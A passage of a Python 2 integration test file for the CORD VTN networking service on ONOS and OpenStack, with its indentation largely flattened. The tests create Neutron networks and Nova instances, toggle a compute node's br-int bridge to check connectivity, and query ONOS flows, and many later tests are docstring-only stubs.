test_two_networks_name = ['vtn_test_40_net_management','vtn_test_40_netA_private','vtn_test_40_netB_private']
test_two_sub_networks_cidr = [["management","172.27.0.0/24", "172.27.0.20", "172.27.0.21"], ["private","10.160.160.192/26",'10.160.160.193'], ["private","10.160.161.192/26",'10.160.161.193']]
test_management_type = ["management_local", 'private','private']
first_instance_vm_name = 'vtn_test_40_nova_first_instance_management_netA'
second_instance_vm_name = 'vtn_test_40_nova_second_instance_management_netB'
# image_name = "vsg-1.1"
image_name = "trusty-server-multi-nic"
flavor_id = 'm1.small'
for test_net_name in test_two_networks_name:
result = self.neutron_network_creation_and_validation(test_net_name)
assert_equal(result, True)
neutron_creds = self.get_neutron_credentials()
neutron = neutronclient.Client(**neutron_creds)
#for test_net_name,test_sub_net_cidr in test_two_networks_name test_two_sub_networks_cidr:
for i in range(0,3):
networks = neutron.list_networks(name=test_two_networks_name[i])
network_id = self.get_key_value(d=networks, key = 'id')
sub_result = self.neutron_subnet_creation_and_validation(test_two_networks_name[i],test_two_sub_networks_cidr[i])
assert_equal(sub_result[0], True)
net_type_post = self.sub_network_type_post_to_onos(test_two_networks_name[i], test_management_type[i])
print net_type_post
creds = get_nova_credentials()
nova = nova_client.Client('2', **creds)
print nova.security_groups.list()
new_first_instance_details = self.nova_instance_creation_and_validation(['vtn_test_40_net_management','vtn_test_40_netA_private'],nova,first_instance_vm_name,image_name,flavor_id)
new_second_instance_details = self.nova_instance_creation_and_validation(['vtn_test_40_net_management','vtn_test_40_netB_private'],nova,second_instance_vm_name,image_name,flavor_id)
time.sleep(60)
assert_equal(new_first_instance_details.status, 'ACTIVE')
assert_equal(new_second_instance_details.status, 'ACTIVE')
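        # Posting a service dependency between the two private networks to ONOS
        # should allow traffic between them, so the instance-to-instance ping
        # below is expected to succeed.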
service_dependency_post = self.service_dependency_on_network_post_to_onos(test_two_networks_name[1],test_two_networks_name[2],test_management_type[1])
print service_dependency_post
compute_details = self.get_compute_nodes()
first_instance_address = new_first_instance_details.addresses
second_instance_address = new_second_instance_details.addresses
print 'Nova first instance management ip = %s and private ip %s'%(first_instance_address[test_two_networks_name[0]][0]['addr'],first_instance_address[test_two_networks_name[1]][0]['addr'])
print 'Nova second instance management ip = %s and private ip %s'%(second_instance_address[test_two_networks_name[0]][0]['addr'],second_instance_address[test_two_networks_name[2]][0]['addr'])
secgroup = nova.security_groups.find(name="default")
        #nova.security_group_rules.create(secgroup.id, ip_protocol="tcp",
        #                                 from_port="22", to_port="22",
        #                                 cidr="0.0.0.0/0")
        #nova.security_group_rules.create(secgroup.id, ip_protocol="icmp",
        #                                 from_port=-1, to_port=-1,
        #                                 cidr="0.0.0.0/0")
print nova.security_groups.list()
status_1, output = self.nova_instance_tenants_access_check(first_instance_address[test_two_networks_name[0]][0]['addr'])
status_2, output = self.nova_instance_tenants_access_check(first_instance_address[test_two_networks_name[1]][0]['addr'],source_tenants_details = second_instance_address[test_two_networks_name[0]][0]['addr'],check_type = "Ping_from_source_tenant")
self.nova_instance_deletion(nova, new_first_instance_details)
self.nova_instance_deletion(nova, new_second_instance_details)
time.sleep(3)
self.neutron_network_deletion(test_two_networks_name[0])
self.neutron_network_deletion(test_two_networks_name[1])
assert_equal(status_1, True)
assert_equal(status_2, True)
def test_cordvtn_management_network_instance_and_validate_connectivity_from_host_machine_or_compute_node_after_br_int_bridge_is_down(self):
"""
        Test Method:
        0. Create Test-Net
        1. Create a subnetwork whose IP is under the management network
        2. Do a GET REST API call and validate creation of the network
        3. Create a new nova instance under the management network
        4. Validate that the new nova instance is created on the nova service
        5. Verify that ping from the compute node to the nova instance created in step 3 is successful
        6. Bring the br-int bridge down on the compute node and verify that connectivity to the instance fails
"""
test_net_name = 'vtn_test_41_net_management'
test_sub_net_cidr = ["management","172.27.0.0/24", "172.27.0.20", "172.27.0.21"]
test_management_type = "management_local"
instance_vm_name = 'vtn_test_41_nova_instance_management_net'
#image_name = "vsg-1.1"
image_name = "trusty-server-multi-nic"
flavor_id = 'm1.small'
result = self.neutron_network_creation_and_validation(test_net_name)
assert_equal(result, True)
neutron_creds = self.get_neutron_credentials()
neutron = neutronclient.Client(**neutron_creds)
networks = neutron.list_networks(name=test_net_name)
network_id = self.get_key_value(d=networks, key = 'id')
sub_result = self.neutron_subnet_creation_and_validation(test_net_name,test_sub_net_cidr)
assert_equal(sub_result[0], True)
net_type_post = self.sub_network_type_post_to_onos(test_net_name, test_management_type)
creds = get_nova_credentials()
nova = nova_client.Client('2', **creds)
new_instance_details = self.nova_instance_creation_and_validation(test_net_name,nova,instance_vm_name,image_name,flavor_id)
assert_equal(new_instance_details.status, 'ACTIVE')
compute_details = self.get_compute_nodes()
print new_instance_details.addresses
address = new_instance_details.addresses
print 'Nova instance management ip = %s'%(address[test_net_name][0]['addr'])
time.sleep(60)
status, output = self.nova_instance_tenants_access_check(address[test_net_name][0]['addr'])
if status is False:
self.nova_instance_deletion(nova, new_instance_details)
time.sleep(5)
self.neutron_network_deletion(test_net_name)
assert_equal(status, True)
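        # Bring the integration bridge (br-int) down on the compute node; this
        # should break the data path to the instance, so the follow-up access
        # check is expected to fail. The compute node address is hard-coded here.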
cmd = 'sudo ifconfig br-int down'
#compute_details = self.get_compute_nodes()
compute_details = '10.1.0.17'
ssh_agent = SSHTestAgent(host = compute_details)
status, output = ssh_agent.run_cmd(cmd, timeout = 5)
print output
status, output = self.nova_instance_tenants_access_check(address[test_net_name][0]['addr'])
self.nova_instance_deletion(nova, new_instance_details)
time.sleep(5)
self.neutron_network_deletion(test_net_name)
cmd = 'sudo ifconfig br-int up'
status, output = ssh_agent.run_cmd(cmd, timeout = 5)
assert_equal(status, False)
def test_cordvtn_management_network_instance_and_validate_connectivity_from_host_machine_or_compute_node_toggling_br_int_bridge(self):
"""
        Test Method:
        0. Bring the br-int bridge down on the compute node
        1. Create Test-Net and a subnetwork whose IP is under the management network
        2. Do a GET REST API call and validate creation of the network
        3. Create a new nova instance under the management network and validate it is ACTIVE
        4. Verify that ping from the compute node to the nova instance fails while br-int is down
        5. Bring the br-int bridge up and verify that ping to the nova instance succeeds
"""
test_net_name = 'vtn_test_42_net_management'
test_sub_net_cidr = ["management","172.27.0.0/24", "172.27.0.20", "172.27.0.21"]
test_management_type = "management_local"
instance_vm_name = 'vtn_test_42_nova_instance_management_net'
#image_name = "vsg-1.1"
image_name = "trusty-server-multi-nic"
flavor_id = 'm1.small'
cmd = 'sudo ifconfig br-int down'
#compute_details = self.get_compute_nodes()
compute_details = '10.1.0.17'
ssh_agent = SSHTestAgent(host = compute_details)
status, output = ssh_agent.run_cmd(cmd, timeout = 5)
print output
result = self.neutron_network_creation_and_validation(test_net_name)
assert_equal(result, True)
neutron_creds = self.get_neutron_credentials()
neutron = neutronclient.Client(**neutron_creds)
networks = neutron.list_networks(name=test_net_name)
network_id = self.get_key_value(d=networks, key = 'id')
sub_result = self.neutron_subnet_creation_and_validation(test_net_name,test_sub_net_cidr)
assert_equal(sub_result[0], True)
net_type_post = self.sub_network_type_post_to_onos(test_net_name, test_management_type)
creds = get_nova_credentials()
nova = nova_client.Client('2', **creds)
new_instance_details = self.nova_instance_creation_and_validation(test_net_name,nova,instance_vm_name,image_name,flavor_id)
assert_equal(new_instance_details.status, 'ACTIVE')
compute_details = self.get_compute_nodes()
print new_instance_details.addresses
address = new_instance_details.addresses
print 'Nova instance management ip = %s'%(address[test_net_name][0]['addr'])
time.sleep(60)
status, output = self.nova_instance_tenants_access_check(address[test_net_name][0]['addr'])
if status is True:
self.nova_instance_deletion(nova, new_instance_details)
time.sleep(5)
self.neutron_network_deletion(test_net_name)
assert_equal(status, False)
cmd = 'sudo ifconfig br-int up'
#compute_details = self.get_compute_nodes()
compute_details = '10.1.0.17'
ssh_agent = SSHTestAgent(host = compute_details)
status, output = ssh_agent.run_cmd(cmd, timeout = 5)
print output
status, output = self.nova_instance_tenants_access_check(address[test_net_name][0]['addr'])
self.nova_instance_deletion(nova, new_instance_details)
time.sleep(5)
self.neutron_network_deletion(test_net_name)
assert_equal(status, True)
def test_cordvtn_management_network_instance_and_validate_connectivity_from_host_machine_or_compute_node_checking_onos_flows(self):
"""
        Test Method:
        0. Bring the br-int bridge down on the compute node
        1. Create Test-Net and a subnetwork whose IP is under the management network
        2. Do a GET REST API call and validate creation of the network
        3. Create a new nova instance under the management network and validate it is ACTIVE
        4. Check the flows installed in ONOS and verify that ping to the nova instance fails while br-int is down
        5. Bring the br-int bridge up, re-check the ONOS flows and verify that ping to the nova instance succeeds
"""
test_net_name = 'vtn_test_43_net_management'
test_sub_net_cidr = ["management","172.27.0.0/24", "172.27.0.20", "172.27.0.21"]
test_management_type = "management_local"
instance_vm_name = 'vtn_test_43_nova_instance_management_net'
#image_name = "vsg-1.1"
image_name = "trusty-server-multi-nic"
flavor_id = 'm1.small'
cmd = 'sudo ifconfig br-int down'
#compute_details = self.get_compute_nodes()
compute_details = '10.1.0.17'
ssh_agent = SSHTestAgent(host = compute_details)
status, output = ssh_agent.run_cmd(cmd, timeout = 5)
print output
result = self.neutron_network_creation_and_validation(test_net_name)
assert_equal(result, True)
neutron_creds = self.get_neutron_credentials()
neutron = neutronclient.Client(**neutron_creds)
networks = neutron.list_networks(name=test_net_name)
network_id = self.get_key_value(d=networks, key = 'id')
sub_result = self.neutron_subnet_creation_and_validation(test_net_name,test_sub_net_cidr)
assert_equal(sub_result[0], True)
net_type_post = self.sub_network_type_post_to_onos(test_net_name, test_management_type)
creds = get_nova_credentials()
nova = nova_client.Client('2', **creds)
new_instance_details = self.nova_instance_creation_and_validation(test_net_name,nova,instance_vm_name,image_name,flavor_id)
assert_equal(new_instance_details.status, 'ACTIVE')
compute_details = self.get_compute_nodes()
print new_instance_details.addresses
address = new_instance_details.addresses
print 'Nova instance management ip = %s'%(address[test_net_name][0]['addr'])
time.sleep(60)
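        # Query the ONOS CLI for the installed flows so the VTN-programmed rules
        # can be inspected while br-int is down on the compute node.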
self.cliEnter()
flows = json.loads(self.cli.flows(jsonFormat = True))
flows = filter(lambda f: f['flows'], flows)
        print flows
self.cliExit()
status, output = self.nova_instance_tenants_access_check(address[test_net_name][0]['addr'])
if status is True:
self.nova_instance_deletion(nova, new_instance_details)
time.sleep(5)
self.neutron_network_deletion(test_net_name)
assert_equal(status, False)
cmd = 'sudo ifconfig br-int up'
#compute_details = self.get_compute_nodes()
compute_details = '10.1.0.17'
ssh_agent = SSHTestAgent(host = compute_details)
status, output = ssh_agent.run_cmd(cmd, timeout = 5)
print output
self.cliEnter()
flows = json.loads(self.cli.flows(jsonFormat = True))
flows = filter(lambda f: f['flows'], flows)
print flows
self.cliExit()
status, output = self.nova_instance_tenants_access_check(address[test_net_name][0]['addr'])
self.nova_instance_deletion(nova, new_instance_details)
time.sleep(5)
self.neutron_network_deletion(test_net_name)
assert_equal(status, True)
self.cliEnter()
flows = json.loads(self.cli.flows(jsonFormat = True))
flows = filter(lambda f: f['flows'], flows)
print flows
self.cliExit()
    ##### We can't test port-create scenarios on a CiaB setup. #### TODO
def test_cordvtn_creating_vtn_with_vlan_port_connectivity_and_validate_connectivity_from_host_machine_or_compute_node(self):
"""
        Test Method:
        0. Create Test-Net
        1. Create a subnetwork whose IP is under the management network
        2. Do a GET REST API call and validate creation of the network
        3. Create a VLAN port (stag-100) and a new nova instance under the management network
        4. Validate that the new nova instance is created on the nova service
        5. Verify that ping from the compute node to the nova instance created in step 3 is successful
"""
test_net_name = 'vtn_test_41_net_vlan_port'
# test_sub_net_cidr = ["management","172.27.0.0/24", "172.27.0.20", "172.27.0.21"]
# test_management_type = "management_local"
instance_vm_name = 'vtn_test_41_nova_instance_vlan_port_net'
#image_name = "vsg-1.1"
image_name = "trusty-server-multi-nic"
flavor_id = 'm1.small'
# result = self.neutron_network_creation_and_validation(test_net_name)
# assert_equal(result, True)
neutron_creds = self.get_neutron_credentials()
neutron = neutronclient.Client(**neutron_creds)
networks = neutron.list_networks(name=test_net_name)
network_id = self.get_key_value(d=networks, key = 'id')
# sub_result = self.neutron_subnet_creation_and_validation(test_net_name,test_sub_net_cidr)
# assert_equal(sub_result[0], True)
# net_type_post = self.sub_network_type_post_to_onos(test_net_name, test_management_type)
creds = get_nova_credentials()
nova = nova_client.Client('2', **creds)
# new_instance_details = self.nova_instance_creation_and_validation(test_net_name,nova,instance_vm_name,image_name,flavor_id)
# assert_equal(new_instance_details.status, 'ACTIVE')
#body_port_details = {"port": {"admin_state_up" :"True","device_id" :new_instance_details.id, "name":"stag-100","network_id":network_id}}
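        # The port name 'stag-100' follows the stag-<vlan id> convention that the
        # VTN service appears to use for VLAN-tagged ports; device_id is left empty
        # here because the instance creation above is commented out.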
body_port_details = {"port": {"admin_state_up" :"True","device_id" :"", "name":"stag-100","network_id":network_id}}
response = neutron.create_port(body=body_port_details)
print(response)
"""
compute_details = self.get_compute_nodes()
print new_instance_details.addresses
address = new_instance_details.addresses
print 'Nova instance management ip = %s'%(address[test_net_name][0]['addr'])
time.sleep(60)
status, output = self.nova_instance_tenants_access_check(address[test_net_name][0]['addr'])
self.nova_instance_deletion(nova, new_instance_details)
time.sleep(5)
self.neutron_network_deletion(test_net_name)
assert_equal(status, True)
"""
def test_cordvtn_with_neutron_network_creation_and_validation_on_head_node_with_neutron_service(self):
"""
Test Method:
0. Create Test-Net,
1. Load cordvtn config, vtn-cfg-1.json to cord-onos
2. Run sync command for cordvtn
        3. Do a GET REST API call and validate creation of the network
        4. Validate that the created network is synced to cord-onos
"""
creds = self.get_neutron_credentials()
neutron = neutronclient.Client(**creds)
body_example = {"network":{"name": "Net-1","admin_state_up":True}}
net = neutron.create_network(body=body_example)
networks = neutron.list_networks(name='Net-1')
vtn_util = vtn_validation_utils('')
data = networks
result = self.search_value(data, "Net-1")
assert_equal(result, True)
def test_cordvtn_neutron_network_creation_and_validation_on_onos(self):
"""
Test Method:
0. Create Test-Net,
1. Load cordvtn config, vtn-cfg-1.json to cord-onos
2. Run sync command for cordvtn
        3. Do a GET REST API call and validate creation of the network
        4. Validate that the created network is synced to cord-onos
"""
creds = self.get_neutron_credentials()
neutron = neutronclient.Client(**creds)
body_example = {"network":{"name": "Net-1","admin_state_up":True}}
net = neutron.create_network(body=body_example)
networks = neutron.list_networks(name='Net-1')
vtn_util = vtn_validation_utils('')
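        # Validate the sync on the ONOS side: the cordvtn app exposes the synced
        # networks at /onos/cordvtn/serviceNetworks, queried here with the default
        # karaf/karaf credentials.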
url = "http://{0}:8181/onos/cordvtn/serviceNetworks".format(vtn_util.endpoint)
auth = ('karaf','karaf')
resp = requests.get(url=url, auth=auth)
data = json.loads(resp.text)
result = self.search_value(data, "Net-1")
assert_equal(result, True)
def test_cordvtn_neutron_network_deletion_and_validation_on_neutron_openstack(self):
"""
        Test Method:
        0. Create Test-Net
        1. Load cordvtn config, vtn-cfg-1.json to cord-onos
        2. Run sync command for cordvtn
        3. Delete the network and do a GET REST API call to validate the deletion
        4. Validate that the deleted network is no longer present
"""
creds = self.get_neutron_credentials()
neutron = neutronclient.Client(**creds)
        networks = neutron.list_networks(name='Net-1')
        network_id = networks['networks'][0]['id']
        neutron.delete_network(network_id)
        networks = neutron.list_networks(name='Net-1')
        vtn_util = vtn_validation_utils('')
        data = networks
        result = self.search_value(data, "Net-1")
        assert_equal(result, False)
def test_cordvtn_neutron_network_sync(self):
"""
Test Method:
0. Create Test-Net,
1. Load cordvtn config, vtn-cfg-1.json to cord-onos
2. Run sync command for cordvtn
        3. Do a GET REST API call and validate creation of the network
        4. Validate that the created network is synced to cord-onos
"""
creds = self.get_neutron_credentials()
neutron = neutronclient.Client(**creds)
body_example = {"network":{"name": "Test-Net-1","admin_state_up":True}}
        net = neutron.create_network(body=body_example)
        network_id = net['network']['id']
        vtn_util = vtn_validation_utils('')
        url = "http://{0}:8181/onos/cordvtn/serviceNetworks".format(vtn_util.endpoint)
        auth = ('karaf','karaf')
        body_create_subnet = {'subnets': [{'cidr': '192.168.199.0/24',
                              'ip_version': 4, 'network_id': network_id}]}
        subnet = neutron.create_subnet(body=body_create_subnet)
resp = requests.get(url=url, auth=auth)
data = json.loads(resp.text)
result = self.search_value(data, "Test-Net-1")
assert_equal(result, True)
def test_cordvtn_neutron_port_sync(self):
"""
Test Method:
0. Create Test-Net,
1. Load cordvtn config, vtn-cfg-1.json to cord-onos
2. Run sync command for cordvtn
        3. Do a GET REST API call and validate creation of the network
        4. Validate that the created port is synced to cord-onos
"""
creds = self.get_neutron_credentials()
neutron = neutronclient.Client(**creds)
body_example = {"network":{"name": "Test-Net-1","admin_state_up":True}}
net = neutron.create_network(body=body_example)
network_id = net['network']['id']
device_id = 'of:{}'.format(get_mac(self.switch))
body_example = {'port': {'admin_state_up': True,'device_id':device_id, 'network_id':network_id}}
response = neutron.create_port(body=body_example)
vtn_util = vtn_validation_utils('')
url = "http://{0}:8181/onos/cordvtn/servicePorts".format(vtn_util.endpoint)
auth = ('karaf','karaf')
resp = requests.get(url=url, auth=auth)
data = json.loads(resp.text)
result = self.search_value(data, device_id)
assert_equal(result, True)
def test_cordvtn_creating_virtual_private_network(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as private network.
(neutron net-create net-A-private, neutron subnet-create net-A-private 10.0.0.0/24).
4) Verify that NetA is being created and validate IP in nova list command.
5) Verify that flow is being added in ovs-switch in compute-node.
6) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
"""
pass
def test_cordvtn_creating_virtual_local_management_network(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as local management network.
(neutron net-create net-A-management, neutron subnet-create net-A-management 172.27.0.0/24 -gateway 172.27.0.1).
4) Verify that NetA is being created and validate IP in nova list command.
5) Verify that flow is being added in ovs-switch in compute-node.
6) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
"""
pass
def test_cordvtn_creating_virtual_vlan_connectivity_network(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with a vlan port-create.
(neutron port-create net-A-private --name stag-100).
4) Verify that NetA is being created and validate IP in nova list command.
5) Verify that flow is being added in ovs-switch in compute-node.
6) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
"""
pass
def test_cordvtn_creating_virtual_floating_IP_with_vlan_connectivity_network(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with a floating ip and vlan port-create.
(neutron port-create net-A-private --name stag-500).
4) Verify that NetA is being created and validate IP in nova list command.
5) Verify that flow is being added in ovs-switch in compute-node.
6) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
"""
pass
def test_cordvtn_creating_virtual_private_network_and_boot_image(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as private network.
(neutron net-create net-A-private, neutron subnet-create net-A-private 10.0.0.0/24).
4) Now boot image in the same created network using nova boot image command (example given below :-
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
5) Wait till VM boots up and starts running.
6) Verify that a VM is launched and running by using novaclient python API.
7) Verify that flow is being added in ovs-switch in compute-node.
8) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
9) Verify that cord-onos pushed flows to OVS switch.
"""
pass
def test_cordvtn_creating_virtual_public_network_and_boot_image(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as public network.
(neutron net-create net-A-public, neutron subnet-create net-A-public 198.0.0.0/24).
4) Now boot image in the same created network using nova boot image command (example given below :-
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
5) Wait till VM boots up and starts running.
6) Verify that a VM is launched and running by using novaclient python API.
7) Verify that flow is being added in ovs-switch in compute-node.
8) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
9) Verify that cord-onos pushed flows to OVS switch.
"""
pass
def test_cordvtn_creating_virtual_local_management_network_and_boot_image(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as local management network.
(neutron net-create net-A-management, neutron subnet-create net-A-management 172.27.0.0/24 -gateway 172.27.0.1).
4) Now boot image in the same created network using nova boot image command (example given below :-
nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
5) Wait till VM boots up and starts running.
6) Verify that a VM is launched and running by using novaclient python API.
7) Verify that flow is being added in ovs-switch in compute-node.
8) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
9) Verify that cord-onos pushed flows to OVS switch.
"""
pass
def test_cordvtn_creating_virtual_vlan_connectivity_network_and_boot_image(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with a vlan port-create.
(neutron port-create net-A-private --name stag-100).
4) Now boot image in the same created network using nova boot image command (example given below :-
nova boot --image 6ba954df-063f-4379-9e2a-920050879918 --flavor 2 --nic port-id=2c7a397f-949e-4502-aa61-2c9cefe96c74 --user-data passwd.data vsg-01
5) Wait till VM boots up and starts running.
6) Verify that a VM is launched and running by using novaclient python API.
7) Verify that flow is being added in ovs-switch in compute-node.
8) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
9) Verify that cord-onos pushed flows to OVS switch.
"""
pass
def test_cordvtn_creating_virtual_floating_IP_with_vlan_connectivity_network_and_boot_image(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with a floating ip and vlan port-create.
(neutron port-create net-A-private --name stag-500).
4) Now boot image in the same created network using nova boot image command (example given below :-
nova boot --image 6ba954df-063f-4379-9e2a-920050879918 --flavor 2 --nic port-id=2c7a397f-949e-4502-aa61-2c9cefe96c74 --user-data passwd.data vsg-01
5) Wait till VM boots up and starts running.
6) Verify that a VM is launched and running by using novaclient python API.
7) Verify that flow is being added in ovs-switch in compute-node.
8) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
9) Verify that cord-onos pushed flows to OVS switch.
"""
pass
def test_cordvtn_creating_virtual_private_network_and_boot_2_images_in_same_service(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as private network.
(neutron net-create net-A-private, neutron subnet-create net-A-private 10.0.0.0/24).
4) Now boot 2 images in the same created network using nova boot image command (example given below :-
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-02
5) Wait till VMs boot up and running.
6) Verify that two VMs are launched and running by using novaclient python API.
7) Verify that flow is being added in ovs-switch in compute-node.
8) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
9) Verify that cord-onos pushed flows to OVS switch.
"""
pass
def test_cordvtn_creating_virtual_public_network_and_boot_2_images_in_same_service(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as public network.
(neutron net-create net-A-public, neutron subnet-create net-A-public 198.0.0.0/24).
4) Now boot 2 images in the same created network using nova boot image command (example given below :-
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-02
5) Wait till VMs boot up and running.
6) Verify that two VMs are launched and running by using novaclient python API.
7) Verify that flow is being added in ovs-switch in compute-node.
8) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
9) Verify that cord-onos pushed flows to OVS switch.
"""
pass
def test_cordvtn_creating_virtual_local_management_network_and_boot_2_images_in_same_service(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as local management network.
(neutron net-create net-A-management, neutron subnet-create net-A-management 172.27.0.0/24 -gateway 172.27.0.1).
4) Now boot two images in the same created network using nova boot image command (example given below :-
nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-02
5) Wait till VMs boot up and running.
6) Verify that two VMs are launched and running by using novaclient python API.
7) Verify that flow is being added in ovs-switch in compute-node.
8) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
9) Verify that cord-onos pushed flows to OVS switch.
"""
pass
def test_cordvtn_creating_virtual_vlan_connectivity_network_and_boot_2_images_in_same_service(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with a vlan port-create.
(neutron port-create net-A-private --name stag-100).
4) Now boot two images in the same created network using nova boot image command (example given below :-
nova boot --image 6ba954df-063f-4379-9e2a-920050879918 --flavor 2 --nic port-id=2c7a397f-949e-4502-aa61-2c9cefe96c74 --user-data passwd.data vsg-01
nova boot --image 6ba954df-063f-4379-9e2a-920050879918 --flavor 2 --nic port-id=2c7a397f-949e-4502-aa61-2c9cefe96c74 --user-data passwd.data vsg-01
5) Wait till VMs boot up and running.
6) Verify that two VMs are launched and running by using novaclient python API.
7) Verify that flow is being added in ovs-switch in compute-node.
8) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
9) Verify that cord-onos pushed flows to OVS switch.
"""
pass
def test_cordvtn_creating_virtual_floating_IP_with_vlan_connectivity_network_and_boot_2_images_in_same_service(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with a floating ip and vlan port-create.
(neutron port-create net-A-private --name stag-500).
4) Now boot two images in the same created network using nova boot image command (example given below :-
nova boot --image 6ba954df-063f-4379-9e2a-920050879918 --flavor 2 --nic port-id=2c7a397f-949e-4502-aa61-2c9cefe96c74 --user-data passwd.data vsg-01
nova boot --image 6ba954df-063f-4379-9e2a-920050879918 --flavor 2 --nic port-id=2c7a397f-949e-4502-aa61-2c9cefe96c74 --user-data passwd.data vsg-02
5) Wait till VMs boot up and running.
6) Verify that two VMs are launched and running by using novaclient python API.
7) Verify that flow is being added in ovs-switch in compute-node.
8) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
9) Verify that cord-onos pushed flows to OVS switch.
"""
pass
def test_cordvtn_creating_virtual_private_network_and_boot_2_images_in_same_service_connectivity(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as private network.
(neutron net-create net-A-private, neutron subnet-create net-A-private 10.0.0.0/24).
4) Now boot 2 images in the same created network using nova boot image command (example given below :-
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-02
5) Wait till VMs boot up and running.
6) Verify that two VMs are launched and running by using novaclient python API.
7) Now ping to the VM from other VM which are launched in same network
8) verify that ping is successful
9) Verify that flow is being added in ovs-switch in compute-node.
10) Verify that onos-ml2 plugin syncs through ReST call from openstack service neutron.
11) Verify that cord-onos pushed flows to OVS switch.
"""
pass
def test_cordvtn_creating_virtual_public_network_and_boot_2_images_in_same_service_connectivity_negative_scenario(self):
"""
Test Method:
1) Validate that required openstack service is up and running.
2) Validate that compute node is being created and get compute node name by using "sudo cord prov list".
3) From CORD-Test container, use python-neutron client and create network with name - NetA with an IP as public network.
(neutron net-create net-A-public, neutron subnet-create net-A-public 198.0.0.0/24).
4) Now boot 2 images in the same created network using nova boot image command (example given below :-
$ nova boot --image 3e2d7760-774a-4a16-be07-aaccafa779b6 --flavor 1 --nic net-id=8bc19377-f493-4cad-af23-45fb299da9de net-A-vm-01
